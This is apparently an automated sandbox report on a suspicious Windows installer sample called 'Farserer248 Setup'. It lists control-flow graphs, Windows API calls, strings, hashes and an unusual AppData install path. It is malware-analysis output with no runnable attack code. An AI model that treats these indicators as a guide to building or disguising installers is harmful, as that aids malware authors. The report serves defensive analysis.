178->177 179->178 180->181 186 404c78-404c91 call 40554f 181->186 187 404c6e-404c76 SendMessageW 181->187 188 404f1a-404f1c 182->188 189 404e0a-404e3c CreatePopupMenu call 405ece AppendMenuW 182->189 195 404c93-404ca7 ShowWindow 186->195 196 404cc5-404ceb GetDlgItem SendMessageW 186->196 187->186 188->174 197 404e52-404e6e TrackPopupMenu 189->197 198 404e3e-404e4e GetWindowRect 189->198 201 404cb4 195->201 202 404ca9-404cb2 ShowWindow 195->202 196->188 200 404cf1-404d09 SendMessageW * 2 196->200 197->188 199 404e74-404e80 197->199 198->197 204 404e88-404ea2 SendMessageW 199->204 200->188 203 404cba-404cc0 call 405538 201->203 202->203 203->196 204->204 206 404ea4-404ece OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 204->206 207 404ed0-404efc SendMessageW 206->207 207->207 208 404efe-404f14 GlobalUnlock SetClipboardData CloseClipboard 207->208 208->188
                          APIs
                          • GetDlgItem.USER32(?,00000403), ref: 00404BC6
                          • GetDlgItem.USER32(?,000003EE), ref: 00404BD6
                          • GetClientRect.USER32(00000000,?), ref: 00404C13
                          • GetSystemMetrics.USER32(00000002), ref: 00404C1B
                          • SendMessageW.USER32(00000000,00001061,00000000,00000002), ref: 00404C3D
                          • SendMessageW.USER32(00000000,00001036,00004000,00004000), ref: 00404C4C
                          • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00404C5A
                          • SendMessageW.USER32(00000000,00001026,00000000,?), ref: 00404C64
                            • Part of subcall function 00405ECE: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004060A0
                          • SendMessageW.USER32(00000000,00001024,00000000,?), ref: 00404C76
                          • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00404C9A
                          • ShowWindow.USER32(00000000,00000008), ref: 00404CAC
                          • GetDlgItem.USER32(?,000003EC), ref: 00404CCE
                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00404CE2
                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00404CFD
                          • SendMessageW.USER32(00000000,00002001,00000000,?), ref: 00404D07
                          • ShowWindow.USER32(00000000), ref: 00404D7C
                          • ShowWindow.USER32(?,00000008), ref: 00404D81
                          • GetDlgItem.USER32(?,000003F8), ref: 00404BE6
                            • Part of subcall function 00405538: SendMessageW.USER32(00000028,?,00000001,0040536D), ref: 00405546
                          • GetDlgItem.USER32(?,000003EC), ref: 00404D27
                          • CreateThread.KERNELBASE(00000000,00000000,Function_00005899,00000000), ref: 00404D35
                          • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00404D3C
                          • ShowWindow.USER32(00000008), ref: 00404DB7
                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                          • CreatePopupMenu.USER32 ref: 00404E0A
                          • AppendMenuW.USER32(?,00000000,00000001,00000000), ref: 00404E26
                          • GetWindowRect.USER32(?,?), ref: 00404E44
                          • TrackPopupMenu.USER32(?,00000180,?,?,00000000,?,00000000), ref: 00404E66
                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00404E95
                          • OpenClipboard.USER32(00000000), ref: 00404EA5
                          • EmptyClipboard.USER32 ref: 00404EAB
                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00404EB7
                          • GlobalLock.KERNEL32(00000000), ref: 00404EC4
                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00404EE0
                          • GlobalUnlock.KERNEL32(?), ref: 00404F03
                          • SetClipboardData.USER32(0000000D,?), ref: 00404F0E
                          • CloseClipboard.USER32 ref: 00404F14
                          Strings
                          • Farserer248 Setup: Completed, xrefs: 00404E78
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlocklstrcat
                          • String ID: Farserer248 Setup: Completed
                          • API String ID: 2449414213-2307343146
                          • Opcode ID: 1f3e19829a1891f8564f85fc036817145a0997e7e9e6b60a717e84ac5e359c57
                          • Instruction ID: 02fe976126cbaf1a6fc3493159206c2a1d104913882a8157006961078fd299e5
                          • Opcode Fuzzy Hash: 1f3e19829a1891f8564f85fc036817145a0997e7e9e6b60a717e84ac5e359c57
                          • Instruction Fuzzy Hash: AFA1A1B1605304BBD720AF25DE49E5B7FADFF88750F00443EF685A62A1CB789841CB69
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 705 40673f-406768 call 40665e 708 406781-40678b 705->708 709 40676a-40677c DeleteFileW 705->709 711 40678d-40678f 708->711 712 40679e-4067b1 call 406b40 708->712 710 406900-406909 709->710 713 406795-406798 711->713 714 4068ef-4068f5 711->714 719 4067c1-4067c2 call 406d36 712->719 720 4067b3-4067bf lstrcatW 712->720 713->712 718 4068b8-4068c0 call 4065f5 713->718 717 4068ff 714->717 717->710 718->717 727 4068c2-4068d6 call 40657c call 4065ab 718->727 722 4067c7-4067cc 719->722 720->722 725 4067d8-4067de lstrcatW 722->725 726 4067ce-4067d6 722->726 728 4067e0-406803 lstrlenW FindFirstFileW 725->728 726->725 726->728 741 4068f7-4068fa call 405d6f 727->741 742 4068d8-4068da 727->742 730 4068a1-4068a6 728->730 731 406809-40680b 728->731 730->717 733 4068a8-4068b6 730->733 734 40680c-406811 731->734 733->714 733->718 736 406813-406819 734->736 737 40682a-40683d call 406b40 734->737 739 406883-406894 FindNextFileW 736->739 740 40681b-406820 736->740 749 406851-40685a call 4065ab 737->749 750 40683f-406846 737->750 739->734 744 40689a-40689b FindClose 739->744 740->737 746 406822-406828 740->746 741->717 742->714 747 4068dc-4068ed call 405d6f call 406263 742->747 744->730 746->737 746->739 747->717 760 40687b-40687e call 405d6f 749->760 761 40685c-40685e 749->761 750->739 752 406848-40684f call 40673f 750->752 752->739 760->739 762 406860-406871 call 405d6f call 406263 761->762 763 406873-406879 761->763 762->739 763->739
                          APIs
                            • Part of subcall function 0040665E: lstrlenW.KERNEL32(00425268,00000000,00425268,00425268,00000000,?,?,00406761,?,00000000,74DF3420,?), ref: 004066B2
                            • Part of subcall function 0040665E: GetFileAttributesW.KERNEL32(00425268,00425268), ref: 004066C3
                          • DeleteFileW.KERNELBASE(?,?,00000000,74DF3420,?), ref: 0040676B
                          • lstrcatW.KERNEL32(00424A68,\*.*), ref: 004067BD
                          • lstrcatW.KERNEL32(?,004082A8), ref: 004067DE
                          • lstrlenW.KERNEL32(?), ref: 004067E1
                          • FindFirstFileW.KERNELBASE(00424A68,?), ref: 004067F8
                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?), ref: 00406889
                          • FindClose.KERNEL32(00000000), ref: 0040689B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: File$Find$lstrcatlstrlen$AttributesCloseDeleteFirstNext
                          • String ID: \*.*
                          • API String ID: 2636146433-1173974218
                          • Opcode ID: c7d4ca52d67952e378cbb2bc69a9f218064257e9e4fb8312320eab13a4bc46f3
                          • Instruction ID: 040231968607b34bb9b2a158c1771ed677aa5033f3f67d588a95bfd1cb23e0ea
                          • Opcode Fuzzy Hash: c7d4ca52d67952e378cbb2bc69a9f218064257e9e4fb8312320eab13a4bc46f3
                          • Instruction Fuzzy Hash: 2F4158321063116AD720BB759C09A6B72ACDF81354F12453FF993B21C0EB3C896286AF
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • FindFirstFileW.KERNELBASE(00000000,00426E68,00000000,004066A2,00425268), ref: 00406600
                          • FindClose.KERNEL32(00000000), ref: 0040660C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: Find$CloseFileFirst
                          • String ID: hnB
                          • API String ID: 2295610775-3660129567
                          • Opcode ID: 04c39e9a30e6258c39c491fedc79fdf69c05ad29cfe5a9b76075cd2b9a189e7b
                          • Instruction ID: 2ada44957634f94fe16e3b7c78607cf3dae8e736d14f09947eb472504c9aac78
                          • Opcode Fuzzy Hash: 04c39e9a30e6258c39c491fedc79fdf69c05ad29cfe5a9b76075cd2b9a189e7b
                          • Instruction Fuzzy Hash: 3AD012355561305BC6501738AE0C84B7A989F553717664E36B4A6F61E0C7758C238AEC
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CoCreateInstance.OLE32(004089C0,?,00000001,004089A0,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004023D8
                          Strings
                          • C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente, xrefs: 0040241F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: CreateInstance
                          • String ID: C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente
                          • API String ID: 542301482-475788456
                          • Opcode ID: 0ea40ecb82d0f2f26ff925ecff68251062728646c1acf61687deaf65a66fff07
                          • Instruction ID: 3a7555ac320af53449748993ff378327c1ec87e06d1af7ab7e734bd0b58c3ef6
                          • Opcode Fuzzy Hash: 0ea40ecb82d0f2f26ff925ecff68251062728646c1acf61687deaf65a66fff07
                          • Instruction Fuzzy Hash: 71414B72604341AFC310EFA5C948A2BBBE9FF89314F10092EF695DB291DB79D805CB16
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402B85
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: FileFindFirst
                          • String ID:
                          • API String ID: 1974802433-0
                          • Opcode ID: 76b3c85830a32840b029d22442974bdb841403041b69b6fbe40bf988d6f2a91d
                          • Instruction ID: 413ff2f9ee0246481f93823f5d824a9f083a43ab9ee229324fd948d7b793fb49
                          • Opcode Fuzzy Hash: 76b3c85830a32840b029d22442974bdb841403041b69b6fbe40bf988d6f2a91d
                          • Instruction Fuzzy Hash: E4D0EC61414550AAD1606F718D49EBA73ADAF05354F204A3EF196E10D1EAB85501932B
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 209 404fc7-404fe0 210 404fe6-404fec 209->210 211 405168-40517a 209->211 210->211 214 404ff2-404ff5 210->214 212 4051c2-4051d6 211->212 213 40517c-4051bc GetDlgItem * 2 call 40554f SetClassLongW call 401533 211->213 216 405214-405219 call 40551d 212->216 217 4051d8-4051da 212->217 213->212 218 405011-405014 214->218 219 404ff7-40500c SetWindowPos 214->219 227 40521e-40523d 216->227 224 40520c-40520e 217->224 225 4051dc-4051e7 call 401399 217->225 221 405064-40506a 218->221 222 405016-405035 ShowWindow 218->222 226 405154 219->226 230 405086-405089 221->230 231 40506c-405081 DestroyWindow 221->231 228 405158-405163 call 405790 222->228 229 40503b-405051 GetWindowLongW 222->229 224->216 234 4054df 224->234 225->224 251 4051e9-405207 SendMessageW 225->251 226->228 236 405250-405256 227->236 237 40523f-40524a call 401533 227->237 243 4054e1-4054e8 228->243 229->228 238 405057-40505f ShowWindow 229->238 240 40508b-405099 SetWindowLongW 230->240 241 40509e-4050a4 230->241 239 4054c3-4054ca 231->239 234->243 248 40525c-40525e 236->248 249 40549f-4054b8 DestroyWindow EndDialog 236->249 237->236 238->228 239->234 247 4054cc-4054ce 239->247 240->243 241->226 250 4050aa-4050c4 GetDlgItem 241->250 247->234 254 4054d0-4054d9 ShowWindow 247->254 248->249 255 405264-4052bb call 405ece call 40554f * 3 GetDlgItem 248->255 252 4054be 249->252 256 4050c6-4050df SendMessageW IsWindowEnabled 250->256 257 4050e9-4050ee 250->257 251->243 252->239 254->234 285 4052c9-405318 ShowWindow KiUserCallbackDispatcher * 2 EnableWindow 255->285 286 4052bd-4052c5 255->286 256->234 259 4050e5 256->259 260 4050f0-4050f1 257->260 261 4050f3-4050f6 257->261 259->257 263 405134-405139 call 40598d 260->263 264 405105-405108 261->264 265 4050f8-4050ff 261->265 263->228 266 40510a-405111 264->266 267 40513b-40514e SendMessageW 264->267 265->267 270 405101-405103 265->270 271 405121-40512a call 401533 266->271 272 405113-40511f call 401533 266->272 267->226 270->263 271->228 282 40512c 271->282 281 405132 272->281 281->263 282->281 287 40531a-40531b 285->287 288 40531d 285->288 286->285 289 40531e-405349 GetSystemMenu EnableMenuItem SendMessageW 287->289 288->289 290 405362 289->290 291 40534b-405360 SendMessageW 289->291 292 405368-4053ae call 405538 call 405d50 call 406b40 lstrlenW call 405ece SetWindowTextW call 401399 290->292 291->292 292->227 303 4053b4-4053b6 292->303 303->227 304 4053bc-4053c0 303->304 305 4053c2-4053c8 304->305 306 4053df-4053f3 DestroyWindow 304->306 305->234 307 4053ce-4053d4 305->307 306->252 308 4053f9-405426 CreateDialogParamW 306->308 307->227 309 4053da 307->309 308->239 310 40542c-405483 call 40554f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401399 308->310 309->234 310->234 315 405485-405498 ShowWindow call 40551d 310->315 317 40549d 315->317 317->252
                          APIs
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00405006
                          • ShowWindow.USER32(?), ref: 00405030
                          • GetWindowLongW.USER32(?,000000F0), ref: 00405041
                          • ShowWindow.USER32(?,00000004), ref: 0040505D
                          • GetDlgItem.USER32(?,00000001), ref: 00405184
                          • GetDlgItem.USER32(?,00000002), ref: 0040518E
                          • SetClassLongW.USER32(?,000000F2,?), ref: 004051A8
                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004051F6
                          • GetDlgItem.USER32(?,00000003), ref: 004052A5
                          • ShowWindow.USER32(00000000,?), ref: 004052CE
                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004052E2
                          • KiUserCallbackDispatcher.NTDLL(?), ref: 004052F6
                          • EnableWindow.USER32(?), ref: 0040530E
                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405325
                          • EnableMenuItem.USER32(00000000), ref: 0040532C
                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040533D
                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00405354
                          • lstrlenW.KERNEL32(Farserer248 Setup: Completed,?,Farserer248 Setup: Completed,00000000), ref: 00405385
                            • Part of subcall function 00405ECE: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004060A0
                          • SetWindowTextW.USER32(?,Farserer248 Setup: Completed), ref: 0040539D
                            • Part of subcall function 00401399: MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
                            • Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409
                          • DestroyWindow.USER32(?,00000000), ref: 004053E5
                          • CreateDialogParamW.USER32(?,?,-0042953F), ref: 00405419
                            • Part of subcall function 0040554F: SetDlgItemTextW.USER32(?,?,00000000), ref: 00405569
                          • GetDlgItem.USER32(?,000003FA), ref: 00405442
                          • GetWindowRect.USER32(00000000), ref: 00405449
                          • ScreenToClient.USER32(?,?), ref: 00405455
                          • SetWindowPos.USER32(00000000,?,?,00000000,00000000,00000015), ref: 0040546E
                          • ShowWindow.USER32(00000008,?,00000000), ref: 0040548D
                            • Part of subcall function 0040551D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040552F
                          • ShowWindow.USER32(?,0000000A), ref: 004054D3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: Window$Item$MessageSendShow$CallbackDispatcherEnableLongMenuTextUser$ClassClientCreateDestroyDialogParamRectScreenSystemlstrcatlstrlen
                          • String ID: Farserer248 Setup: Completed
                          • API String ID: 162979904-2307343146
                          • Opcode ID: df99ce79e6b8f8b1480dc5df11ce5c5cdba03e855b63a6f49142b7d1858faae1
                          • Instruction ID: 1387c8c623e38711ffdf662ef8fd173483c39d2718f6c4d101912cea3ea6818b
                          • Opcode Fuzzy Hash: df99ce79e6b8f8b1480dc5df11ce5c5cdba03e855b63a6f49142b7d1858faae1
                          • Instruction Fuzzy Hash: 66D1D3B1601A11BBDB316F21DE08E2B7BA8FB44354F50453EF546B21A1CA789892CF6D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 318 405a73-405a8e call 40690c 321 405a90-405aa0 call 406645 318->321 322 405aa2-405ad8 call 40699d 318->322 329 405afb-405b24 call 4059b4 call 40665e 321->329 327 405af0-405af6 lstrcatW 322->327 328 405ada-405aeb call 40699d 322->328 327->329 328->327 336 405b2a-405b2f 329->336 337 405bbc-405bc4 call 40665e 329->337 336->337 338 405b35-405b5e call 40699d 336->338 343 405bd2-405c00 LoadImageW 337->343 344 405bc6-405bcd call 405ece 337->344 338->337 345 405b60-405b66 338->345 347 405c02-405c2d RegisterClassW 343->347 348 405c7f-405c87 call 401533 343->348 344->343 350 405b68-405b76 call 40661c 345->350 351 405b79-405b87 lstrlenW 345->351 352 405c36-405c7a SystemParametersInfoW CreateWindowExW 347->352 353 405c2f-405c31 347->353 359 405d39-405d3b 348->359 360 405c8d-405c98 call 4059b4 348->360 350->351 356 405b89-405b97 lstrcmpiW 351->356 357 405baf-405bb7 call 40657c call 406b40 351->357 352->348 358 405d3c-405d43 353->358 356->357 363 405b99-405ba3 GetFileAttributesW 356->363 357->337 359->358 371 405d20-405d21 call 405899 360->371 372 405c9e-405cb8 ShowWindow call 4061c4 360->372 364 405ba5-405ba7 363->364 365 405ba9-405baa call 406d36 363->365 364->357 364->365 365->357 375 405d26-405d28 371->375 379 405cc4-405cd5 GetClassInfoW 372->379 380 405cba-405cbf call 4061c4 372->380 377 405d44-405d46 call 401533 375->377 378 405d2a-405d30 375->378 387 405d4b 377->387 378->359 381 405d32-405d34 call 401533 378->381 384 405cd7-405ceb GetClassInfoW RegisterClassW 379->384 385 405ced-405d10 DialogBoxParamW call 401533 379->385 380->379 381->359 384->385 389 405d15-405d1e call 403d2d 385->389 387->387 389->358
                          APIs
                            • Part of subcall function 0040690C: GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EB,0000000C), ref: 0040691A
                            • Part of subcall function 0040690C: GetProcAddress.KERNEL32(00000000), ref: 00406936
                          • lstrcatW.KERNEL32(1033,Farserer248 Setup: Completed), ref: 00405AF6
                          • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest,1033,Farserer248 Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Farserer248 Setup: Completed,00000000,00000002,00000000), ref: 00405B7A
                          • lstrcmpiW.KERNEL32(-000000FC,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest,1033,Farserer248 Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Farserer248 Setup: Completed,00000000), ref: 00405B8F
                          • GetFileAttributesW.KERNEL32(: Completed), ref: 00405B9A
                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest), ref: 00405BE3
                            • Part of subcall function 00406645: wsprintfW.USER32 ref: 00406652
                          • RegisterClassW.USER32(004284C0), ref: 00405C28
                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405C3F
                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405C74
                          • ShowWindow.USER32(00000005,00000000), ref: 00405CA6
                          • GetClassInfoW.USER32(00000000,RichEdit20W,004284C0), ref: 00405CD1
                          • GetClassInfoW.USER32(00000000,RichEdit,004284C0), ref: 00405CDE
                          • RegisterClassW.USER32(004284C0), ref: 00405CEB
                          • DialogBoxParamW.USER32(?,00000000,00404FC7,00000000), ref: 00405D06
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                          • String ID: .DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest$Control Panel\Desktop\ResourceLocale$Farserer248 Setup: Completed$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                          • API String ID: 1975747703-3077047402
                          • Opcode ID: 8053771ecacbe4d7e620c4896777d19ec47ff4b781c20a256954b63b5aefce54
                          • Instruction ID: 907d6efafd5fae289e3c0aae91a9a1e5f211ac63e7b18c2ecbdfe2db8e46e084
                          • Opcode Fuzzy Hash: 8053771ecacbe4d7e620c4896777d19ec47ff4b781c20a256954b63b5aefce54
